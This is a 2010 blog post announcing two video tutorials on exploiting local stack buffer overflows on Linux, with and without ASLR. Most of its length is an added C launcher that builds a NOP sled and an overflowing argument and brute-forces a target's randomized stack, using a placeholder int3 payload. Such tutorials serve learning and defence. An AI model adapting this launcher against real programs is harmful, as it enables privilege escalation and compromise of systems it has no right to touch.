Mon Apr 19 23:46:37 CEST 2010
Two brand new video tutorials about buffer overflow exploitation
under a Linux box
--
My video tutorials are back, and the latest two are now on
SecurityTube, so I'll post them here too.
The first video tutorial shows how to exploit a local application
vulnerable to a stack buffer overflow on a Linux kernel without ASLR:
either a kernel that predates address-space randomization (mainline
Linux gained it in 2.6.12), or a newer one with randomization switched
off by setting /proc/sys/kernel/randomize_va_space to 0. Without ASLR
the stack, and therefore the address of an injected payload, is the
same on every run, so a single hard-coded return address is enough.
The technique is old-fashioned, but still effective on many systems out
there, either running deprecated Linux versions or administered by
people who consider ASLR a waste of kernel time. So, just check it out:
http://0x00.ath.cx/video/15
The second video tutorial shows how to exploit a local application
vulnerable to a stack buffer overflow under a modern Linux kernel
(2.6.12 or later, ASLR enabled) on a 32-bit system, by brute-forcing
the stack. The shellcode is placed at the end of a very long environment
variable, preceded by a very long run of NOPs; the saved return address
is overwritten with one fixed guess that points into that region; and
the exploit then re-runs the vulnerable application until the randomized
stack placement puts the NOP sled under the guessed address, at which
point execution slides along the NOPs into our shellcode. Because the
32-bit stack is only shifted within a small window, a long enough sled
gives each run a fair chance of hitting, and the guess lands after a
modest number of tries. Just check it out:
http://0x00.ath.cx/video/14
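The launcher side of both tutorials, as an added example that is not code from the videos or the original post: it builds the NOP-sled environment variable and the overflowing argument, re-runs a target until the payload fires, and estimates how many runs that should take. Everything specific is an assumption: the target is a hypothetical program that copies argv[1] into a fixed stack buffer, the variable name EGG, the 64 KB sled, the i386 little-endian layout, and the 8 MB window used for the estimate (the range within which i386 kernels of that era shift the stack top). The payload is a single int3 so that a hit shows up as SIGTRAP instead of running anything; a real exploit substitutes execve shellcode. The no-ASLR case of the first tutorial is the same code with the guess set to the observed address and expected_attempts() returning 1.

```c
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed placeholder payload: one int3 (0xcc). When the sled is hit the
 * child dies with SIGTRAP, which the launcher treats as "payload ran". Like
 * any environment string the real shellcode must contain no 0x00 byte. */
static const unsigned char SHELLCODE[] = { 0xcc };

/* "EGG=" + sled_len NOPs (0x90) + shellcode, NUL terminated: control landing
 * anywhere in the sled slides forward into the shellcode. */
char *build_env_sled(size_t sled_len, const unsigned char *sc, size_t sc_len)
{
    static const char name[] = "EGG=";
    size_t n = sizeof name - 1;
    char *env = malloc(n + sled_len + sc_len + 1);
    if (env == NULL)
        return NULL;
    memcpy(env, name, n);
    memset(env + n, 0x90, sled_len);
    memcpy(env + n + sled_len, sc, sc_len);
    env[n + sled_len + sc_len] = '\0';
    return env;
}

/* Overflowing argument: the guessed address repeated for `len` bytes
 * (little-endian, i386), so the saved return address is overwritten whatever
 * its exact distance from the buffer. Assumes the saved EIP is 4-byte aligned
 * relative to the buffer (rotate the pattern otherwise) and that `guess` has
 * no 0x00 byte, which would end a strcpy-style copy early. */
char *build_overflow(size_t len, uint32_t guess)
{
    char *buf = malloc(len + 1);
    if (buf == NULL)
        return NULL;
    for (size_t i = 0; i < len; i++)
        buf[i] = (char)((guess >> (8 * (i % 4))) & 0xff);
    buf[len] = '\0';
    return buf;
}

/* Expected runs before the fixed guess falls inside the sled when the stack
 * top is shifted uniformly within `range` bytes: each run hits with
 * probability about sled / range. Range 0 (no ASLR) needs a single run. */
unsigned long expected_attempts(unsigned long range, unsigned long sled)
{
    if (sled == 0)
        return 0;
    if (range <= sled)
        return 1;
    return (range + sled - 1) / sled;
}

/* Run the target once with the overflow as argv[1] and the sled in its
 * environment; return the raw wait status, or -1 on failure. */
int run_once(const char *target, const char *overflow, char *const envp[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)target, (char *)overflow, NULL };
        execve(target, argv, envp);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return status;
}

/* The brute force: rerun until the child dies by SIGTRAP (marker payload ran)
 * or max_tries is exhausted. A SIGSEGV means that run missed the sled.
 * Returns the successful try number, or -1. */
int brute_force(const char *target, const char *overflow, char *const envp[],
                int max_tries)
{
    for (int i = 1; i <= max_tries; i++) {
        int st = run_once(target, overflow, envp);
        if (st < 0)
            return -1;
        if (WIFSIGNALED(st) && WTERMSIG(st) == SIGTRAP)
            return i;
    }
    return -1;
}

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "usage: %s <target> <hex guess> <overflow len>\n", argv[0]);
        return 2;
    }
    size_t sled = 64 * 1024;                              /* assumed sled size */
    char *env = build_env_sled(sled, SHELLCODE, sizeof SHELLCODE);
    char *ovf = build_overflow(strtoul(argv[3], NULL, 0),
                               (uint32_t)strtoul(argv[2], NULL, 16));
    if (env == NULL || ovf == NULL)
        return 1;
    char *const envp[] = { env, NULL };
    printf("expected tries in an 8 MB window: %lu\n",
           expected_attempts(8UL << 20, sled));           /* assumed window */
    int tries = brute_force(argv[1], ovf, envp, 10000);
    printf("result: %d (try number, -1 = gave up)\n", tries);
    return tries > 0 ? 0 : 1;
}
```

Two practical caveats: since 2.6.23 a single argument or environment string is capped at MAX_ARG_STRLEN (32 pages, 128 KB on 4 KB pages), so the sled cannot simply be made as long as one likes; and the guess should be taken from the environment address observed in a debugger run of the target with the same sled, since the sled's position relative to the stack top is what the randomization shifts.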
--
-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GAT d? a? C++++ U++++ P++++ L+++++ E--- W+++ !w PS+++ PE-- Y++ PGP++ X++
R+ tv-- b+>+++ DI++ G++ e+++ h* r++ z**
------END GEEK CODE BLOCK------